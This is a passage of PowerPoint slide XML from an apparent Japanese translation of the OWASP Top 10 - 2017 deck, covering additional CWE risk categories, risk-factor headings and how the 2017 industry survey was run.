                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>は、幅広く含めていますが、考慮・評価すべきリスクは、他に多数あります。以前の</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>に含まれていたリスクもありますが、まだ識別されていない新たな攻撃手法もあります。他に考慮すべき重要なアプリケーションのセキュリティリスクを以下に示します（</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>CWE-ID</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>順）：</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" baseline="0" dirty="0">
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>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4"/>
                        </a:rPr>
                        <a:t>CWE-352: Cross-Site Request Forgery (CSRF)</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5"/>
                        </a:rPr>
                        <a:t>CWE-400: Uncontrolled Resource Consumption ('Resource Exhaustion', '</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>AppDoS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a: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6"/>
                        </a:rPr>
                        <a:t>CWE-434: Unrestricted Upload of File with Dangerous Type</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7"/>
                        </a:rPr>
                        <a:t>CWE-451: User Interface (UI) Misrepresentation of Critical Information (Clickjacking and others)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8"/>
                        </a:rPr>
                        <a:t>CWE-601: Unvalidated Forward and Redirects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9"/>
                        </a:rPr>
                        <a:t>CWE-799: Improper Control of Interaction Frequency (Anti-Automation)</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0"/>
                        </a:rPr>
                        <a:t>CWE-829: Inclusion of Functionality from Untrusted Control Sphere (3rd Party Content)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1"/>
                        </a:rPr>
                        <a:t>CWE-918: Server-Side Request Forgery (SSRF)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0">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819401" y="2846743"/>
            <a:ext cx="995283" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>蔓延度</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Rectangle 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3897233" y="2846743"/>
            <a:ext cx="972947" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>検出のしやすさ</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Rectangle 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1759009" y="2846743"/>
            <a:ext cx="956796" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>悪用のしやすさ</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Rectangle 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4952356" y="2846743"/>
            <a:ext cx="869908" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>技術面</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="36" name="Group 35"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219201" y="2450703"/>
            <a:ext cx="4887049" cy="567264"/>
            <a:chOff x="430949" y="1049627"/>
            <a:chExt cx="5604445" cy="607770"/>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ja-JP" altLang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>セキュリティ上の</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ja-JP" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
              <a:r>
                <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>弱点</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:endParaRP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ja-JP" altLang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>攻撃手法</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:endParaRP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ja-JP" altLang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>影響</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRP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2"/>
              <a:ext cx="572938" cy="309145"/>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ja-JP" altLang="en-US" sz="600" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>脅威</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ja-JP" sz="600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPts val="800"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="ja-JP" altLang="en-US" sz="600" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>エージェント</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRP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352800" y="2474207"/>
            <a:ext cx="192106" cy="369311"/>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846743"/>
            <a:ext cx="718782" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ビジネス面</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Textplatzhalter 1"/>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+RF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Titel 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>リスクファクターに関する詳細</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1007506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116286410"/>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8727">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>概要</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>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600310">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>OWASP Project Summit</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>において、参加者とコミュニティメンバーは、データの量と調査の質の</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>2</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>つの観点から脆弱性の評価を実施することを決定しました。</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1050" dirty="0">
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>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1" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>調査</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" kern="1200" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>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770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200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>調査のために、これまでに</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>"</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>最先端</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>"</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>であると特定されたか、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Top10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>メーリングリストの</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>2017 RC1</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>へのフィードバックにおいて言及された脆弱性のカテゴリーを収集しました。それらのカテゴリーを調査内容に含め、回答者に</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>OWASP Top 10 - 2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>に含めるべきと考える上位</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>4</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>つの脆弱性を選択するよう促しました。調査は、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>年</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>8</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>月</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>2</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>日～</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>9</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>月</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>18</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>日まで実施され、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>516</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1050" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>の回答を得ました。</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-US" sz="105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mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
